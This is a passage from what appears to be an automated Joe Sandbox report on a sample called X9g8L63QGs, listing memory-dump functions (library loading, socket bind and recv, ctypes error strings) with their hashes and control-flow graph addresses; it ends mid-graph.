                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1716221369.00007FFB1D5BA000.00000080.00000001.01000000.0000000E.sdmp, Offset: 00007FFB1D5B0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1716097392.00007FFB1D5B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1716138569.00007FFB1D5B1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1716138569.00007FFB1D5B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1716259793.00007FFB1D5BC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1d5b0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3300690313-0
                                                                                                                                                                                                                                                                    • Opcode ID: 03bd9974f03543807e197ac8506c8372aa4342259d45412b06815e8c386905c0
                                                                                                                                                                                                                                                                    • Instruction ID: 0c27aa662ec51a5d2ce29c2d66aab9994a848d7f9606260bddf5b8dbdb39a4ed
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03bd9974f03543807e197ac8506c8372aa4342259d45412b06815e8c386905c0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C56208A262899686E7258E38D40027D7793F758796F045632EE9EC37C4FBBCEA45C700
                                                                                                                                                                                                                                                                    Function 00007FFB1BA571A0 Relevance: 6.9, APIs: 4, Instructions: 889librarymemoryloaderCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3300690313-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5f32f1e84b7078f76f7840b18c75b772ddf89c4de9b021938304edd184948a2e
                                                                                                                                                                                                                                                                    • Instruction ID: 1bd1c6f0744efd4e2fe839ba255ac97524acc60d063566a7b713f9157565b787
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f32f1e84b7078f76f7840b18c75b772ddf89c4de9b021938304edd184948a2e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF6248A263899286E715CE38D40067D7AD2F749395F04A631EA9ED37D4EE3CEB45CB00
                                                                                                                                                                                                                                                                    Function 00007FFB1AB121D0 Relevance: 6.9, APIs: 4, Instructions: 885librarymemoryloaderCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714860777.00007FFB1AB12000.00000080.00000001.01000000.00000012.sdmp, Offset: 00007FFB1AB00000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714712112.00007FFB1AB00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB01000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB0E000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB11000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714897323.00007FFB1AB13000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ab00000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3300690313-0
                                                                                                                                                                                                                                                                    • Opcode ID: 3fe996ff006b87ba952ac9fe16592842247d2d41a43afbb459ca9963917c1da5
                                                                                                                                                                                                                                                                    • Instruction ID: 4a4c637d6c13e987661f083a21a200753a8ec0cf380d91ef76c240812c949a33
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fe996ff006b87ba952ac9fe16592842247d2d41a43afbb459ca9963917c1da5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F6238A66289D6C6E7258E38E40037E7A95F748795F045532EB9EC37C4EA3CFA45C700
                                                                                                                                                                                                                                                                    Function 00007FFB1D34AC30 Relevance: 6.9, APIs: 4, Instructions: 885librarymemoryloaderCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1716016692.00007FFB1D34A000.00000080.00000001.01000000.00000013.sdmp, Offset: 00007FFB1D340000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715892888.00007FFB1D340000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715936942.00007FFB1D341000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715936942.00007FFB1D349000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1716057701.00007FFB1D34C000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1d340000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3300690313-0
                                                                                                                                                                                                                                                                    • Opcode ID: 9d9fa7327b7d8effa6813891e932a12ccc8efe93bba8629d62c1f2e876fbcae7
                                                                                                                                                                                                                                                                    • Instruction ID: 8d4bc04ac43e49afffaff1d38e9e2faaa8337092c407aedff942dc01a75df920
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d9fa7327b7d8effa6813891e932a12ccc8efe93bba8629d62c1f2e876fbcae7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA6207B262899286E7198E38E40027DB791FB5C7A5F045535EA9EC37C4FB7CEA45CB00
                                                                                                                                                                                                                                                                    Function 00007FFB1BA450C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47networkCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: bind
                                                                                                                                                                                                                                                                    • String ID: bind$socket.bind
                                                                                                                                                                                                                                                                    • API String ID: 1187836755-187351271
                                                                                                                                                                                                                                                                    • Opcode ID: c772f091d13961e78706c3e49babb2eae7ea45e540c7b9e2188f6b33e05915ab
                                                                                                                                                                                                                                                                    • Instruction ID: 8f09234c62dbd8b8f712c67e53bbd2d55d1a314db642e7f05545ca080a886515
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c772f091d13961e78706c3e49babb2eae7ea45e540c7b9e2188f6b33e05915ab
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F1145A1A28F8282E6349B35F4543BA7365FF45BA4F089232DA8D43B65DF3CE505C700
                                                                                                                                                                                                                                                                    Function 00007FFB0C042250 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 586COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: :memory:
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-2920599690
                                                                                                                                                                                                                                                                    • Opcode ID: f17bc2a7fbc240265f12274023a72bab645a00ad97817d0cd97924ee0e2d3e31
                                                                                                                                                                                                                                                                    • Instruction ID: bc26c8c77fc54a04fdd807b81b57745c9679117e25dc5f430b977a19927830f0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f17bc2a7fbc240265f12274023a72bab645a00ad97817d0cd97924ee0e2d3e31
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75428EE2B0D78282EA659B35D558B3A67A1FF85B84F094135EE4D437A1EF3CE494C308
                                                                                                                                                                                                                                                                    Function 00007FF7C26692F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                    • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                                                    • Instruction ID: 26e874244b118fc7e52b1032bab19fe5f4e87fb5eca4fdb226c006e1b1e6809b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51F0A932619741C6F7609F60B448776A361AB44334F480235D9ED12BD4DF7CD058C724
                                                                                                                                                                                                                                                                    Function 00007FFB0C031230 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InfoSystem
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 31276548-0
                                                                                                                                                                                                                                                                    • Opcode ID: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
                                                                                                                                                                                                                                                                    • Instruction ID: 8a33e33300e820ae1148f2f14ed63dc882683611b7847a1049d194ef640dda21
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74A1E6F0E0EB0681FE548B65E85CB7822A9BF49B50F540535D92E4A7A0EF7CE499C34C
                                                                                                                                                                                                                                                                    Function 00007FFB1BA462B4 Relevance: 1.5, APIs: 1, Instructions: 19networkCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: recv
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1507349165-0
                                                                                                                                                                                                                                                                    • Opcode ID: a704ae423db7ff80c5d8b78b9383ad9a6b728f341f5aa79d46b21ad35153d223
                                                                                                                                                                                                                                                                    • Instruction ID: 072ef628a76b3d1979256f95c5cca2aee3ec1178de16476e2053f4f4ee9725b8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a704ae423db7ff80c5d8b78b9383ad9a6b728f341f5aa79d46b21ad35153d223
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18E04FF2E20B55C2D7185B66E0412687361F719FB4F24A721DA381B3E0DE38D4E1C740
                                                                                                                                                                                                                                                                    Function 00007FFB1B6F3D10 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 183COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 1067 7ffb1b6f3d10-7ffb1b6f3d59 1068 7ffb1b6f8b80-7ffb1b6f8b87 1067->1068 1069 7ffb1b6f3d5f-7ffb1b6f3d7d call 7ffb1b7011f8 1067->1069 1070 7ffb1b6f8b90-7ffb1b6f8b97 1068->1070 1075 7ffb1b6f8b89 1069->1075 1076 7ffb1b6f3d83-7ffb1b6f3d86 1069->1076 1072 7ffb1b6f8ba7-7ffb1b6f8bb0 call 7ffb1b701630 1070->1072 1080 7ffb1b6f8bbb 1072->1080 1075->1070 1078 7ffb1b6f8bc5-7ffb1b6f8bda call 7ffb1b6fe16c 1076->1078 1079 7ffb1b6f3d8c-7ffb1b6f3d95 1076->1079 1078->1080 1091 7ffb1b6f8bdc 1078->1091 1082 7ffb1b6f3e62-7ffb1b6f3e6b call 7ffb1b7016d0 1079->1082 1083 7ffb1b6f3d9b-7ffb1b6f3daf 1079->1083 1080->1078 1082->1083 1086 7ffb1b6f3db5-7ffb1b6f3dbf 1083->1086 1087 7ffb1b6f8be1-7ffb1b6f8bff 00007FFB2ADA3440 * 2 1083->1087 1088 7ffb1b6f3dc5-7ffb1b6f3de6 00007FFB1D8942B0 1086->1088 1089 7ffb1b6f8c0c-7ffb1b6f8c2a GetLastError SetLastError 1086->1089 1087->1089 1092 7ffb1b6f3e0a-7ffb1b6f3e11 1088->1092 1094 7ffb1b6f8c37-7ffb1b6f8c4b GetLastError SetLastError 1089->1094 1091->1087 1093 7ffb1b6f3e17-7ffb1b6f3e1a 1092->1093 1092->1094 1095 7ffb1b6f8c51-7ffb1b6f8c63 00007FFB2ADA3440 * 2 1093->1095 1096 7ffb1b6f3e20-7ffb1b6f3e22 1093->1096 1094->1095 1099 7ffb1b6f8c6a-7ffb1b6f8c6f 1095->1099 1097 7ffb1b6f3e24-7ffb1b6f3e27 1096->1097 1098 7ffb1b6f3e70-7ffb1b6f3e79 call 7ffb1b701418 1096->1098 1097->1099 1100 7ffb1b6f3e2d-7ffb1b6f3e30 1097->1100 1098->1097 1099->1100 1104 7ffb1b6f8c75-7ffb1b6f8c7a 1099->1104 1102 7ffb1b6f3e36-7ffb1b6f3e38 1100->1102 1103 7ffb1b6f8c8f-7ffb1b6f8ca8 call 7ffb1b7012e8 1100->1103 1106 7ffb1b6f3e3a-7ffb1b6f3e43 call 7ffb1b701700 1102->1106 1107 7ffb1b6f3e7b-7ffb1b6f3e7d 1102->1107 1103->1080 1114 7ffb1b6f8cae-7ffb1b6f8cb5 1103->1114 1104->1100 1108 7ffb1b6f8c80-7ffb1b6f8c8a call 7ffb1b701280 1104->1108 1110 7ffb1b6f3e45-7ffb1b6f3e61 1106->1110 1107->1110 1108->1100 1117 7ffb1b6f8cb7 1114->1117 1118 7ffb1b6f8d35-7ffb1b6f8d41 1114->1118 1121 7ffb1b6f8cb9-7ffb1b6f8cc0 1117->1121 1122 7ffb1b6f8cf4-7ffb1b6f8d0f 1117->1122 1119 7ffb1b6f8d47-7ffb1b6f8d5d 1118->1119 1120 7ffb1b6f8bb2-7ffb1b6f8bb5 call 7ffb1b701508 1118->1120 1120->1080 1123 7ffb1b6f8ce8 1121->1123 1124 7ffb1b6f8cc2-7ffb1b6f8cc9 1121->1124 1126 7ffb1b6f8d23-7ffb1b6f8d30 call 7ffb1b701250 1122->1126 1127 7ffb1b6f8d11-7ffb1b6f8d1e call 7ffb1b701250 1122->1127 1123->1122 1128 7ffb1b6f8b99 1124->1128 1129 7ffb1b6f8ccf-7ffb1b6f8cd6 1124->1129 1126->1080 1127->1080 1132 7ffb1b6f8ba0 1128->1132 1129->1120 1133 7ffb1b6f8cdc-7ffb1b6f8ce3 1129->1133 1132->1072 1133->1132
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007$A3440$D8942
                                                                                                                                                                                                                                                                    • String ID: No ffi_type for result$ctypes.set_exception$exception: access violation reading %p$exception: access violation writing %p$exception: breakpoint encountered$exception: datatype misalignment$exception: single step$ffi_prep_cif failed
                                                                                                                                                                                                                                                                    • API String ID: 367293148-3190153140
                                                                                                                                                                                                                                                                    • Opcode ID: f65b9f3562c72c42a8a5ca1a0fbf884f3c07981d15f91600d342f1b0e3016292
                                                                                                                                                                                                                                                                    • Instruction ID: 54df4b4080e5c8fe180076b41bd8f4e5c441a10b94430b20a166d4da479a0aee
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f65b9f3562c72c42a8a5ca1a0fbf884f3c07981d15f91600d342f1b0e3016292
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 148131F1A0DE42C1EB548F21EC94279A762BF55BA4F54E07AE94E436B4CF3CE8488700
                                                                                                                                                                                                                                                                    Function 00007FFB0C1A5B40 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 194COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 1136 7ffb0c1a5b40-7ffb0c1a5b5d 1137 7ffb0c1a5b6e-7ffb0c1a5b72 1136->1137 1138 7ffb0c1a5b5f-7ffb0c1a5b68 call 7ffb0c1af1b8 1136->1138 1140 7ffb0c1a5b78-7ffb0c1a5b7d 1137->1140 1141 7ffb0c1ad2d1-7ffb0c1ad2f2 call 7ffb0c1af1c0 call 7ffb0c1af208 1137->1141 1138->1137 1147 7ffb0c1ad2aa-7ffb0c1ad2cc call 7ffb0c1af1b8 call 7ffb0c1af4b8 1138->1147 1144 7ffb0c1a5b83-7ffb0c1a5b86 1140->1144 1145 7ffb0c1a5f36-7ffb0c1a5f4b call 7ffb0c1af4e8 1140->1145 1148 7ffb0c1a5b8c-7ffb0c1a5ba3 call 7ffb0c1af110 1144->1148 1149 7ffb0c1a5e71-7ffb0c1a5e83 call 7ffb0c1af518 1144->1149 1145->1147 1161 7ffb0c1a5d82-7ffb0c1a5d84 1147->1161 1160 7ffb0c1a5ba9-7ffb0c1a5bc3 call 7ffb0c1af478 1148->1160 1148->1161 1149->1148 1163 7ffb0c1a5e89 1149->1163 1160->1161 1168 7ffb0c1a5bc9-7ffb0c1a5bf0 call 7ffb0c1af710 1160->1168 1166 7ffb0c1a5d27-7ffb0c1a5d37 1161->1166 1163->1161 1171 7ffb0c1a5bf6-7ffb0c1a5bfd 1168->1171 1172 7ffb0c1a5ed5-7ffb0c1a5ee9 call 7ffb0c1af4e8 1168->1172 1171->1171 1173 7ffb0c1a5bff-7ffb0c1a5c02 1171->1173 1172->1161 1175 7ffb0c1a5e58-7ffb0c1a5e6c call 7ffb0c1af4e8 1173->1175 1176 7ffb0c1a5c08-7ffb0c1a5c31 call 7ffb0c1af470 call 7ffb0c1af760 1173->1176 1175->1161 1183 7ffb0c1a5c37-7ffb0c1a5c44 call 7ffb0c1af238 1176->1183 1186 7ffb0c1a5d77-7ffb0c1a5d7d call 7ffb0c1a58a0 1183->1186 1187 7ffb0c1a5c4a-7ffb0c1a5c5b 1183->1187 1186->1161 1188 7ffb0c1a5d86-7ffb0c1a5d8c 1187->1188 1189 7ffb0c1a5c61-7ffb0c1a5c68 1187->1189 1191 7ffb0c1a5d9e-7ffb0c1a5da4 1188->1191 1192 7ffb0c1a5d8e-7ffb0c1a5d97 1188->1192 1193 7ffb0c1a5cf3-7ffb0c1a5d06 call 7ffb0c1af210 1189->1193 1194 7ffb0c1a5c6e-7ffb0c1a5c74 1189->1194 1199 7ffb0c1a5da6-7ffb0c1a5dba 1191->1199 1200 7ffb0c1a5dfc-7ffb0c1a5e0a call 7ffb0c1af4e8 1191->1200 1192->1188 1197 7ffb0c1a5d99 1192->1197 1205 7ffb0c1a5e10-7ffb0c1a5e20 call 7ffb0c1af7b8 1193->1205 1208 7ffb0c1a5d0c-7ffb0c1a5d24 call 7ffb0c1af1a0 1193->1208 1195 7ffb0c1a5d38-7ffb0c1a5d3e 1194->1195 1196 7ffb0c1a5c7a-7ffb0c1a5c7d 1194->1196 1195->1196 1201 7ffb0c1a5d44-7ffb0c1a5d57 1195->1201 1196->1193 1202 7ffb0c1a5c7f-7ffb0c1a5c97 00007FFB2ADB6A30 1196->1202 1199->1200 1200->1205 1206 7ffb0c1a5d6d-7ffb0c1a5d72 1201->1206 1202->1206 1207 7ffb0c1a5c9d-7ffb0c1a5cb5 00007FFB2ADB6A30 1202->1207 1205->1166 1206->1193 1207->1206 1210 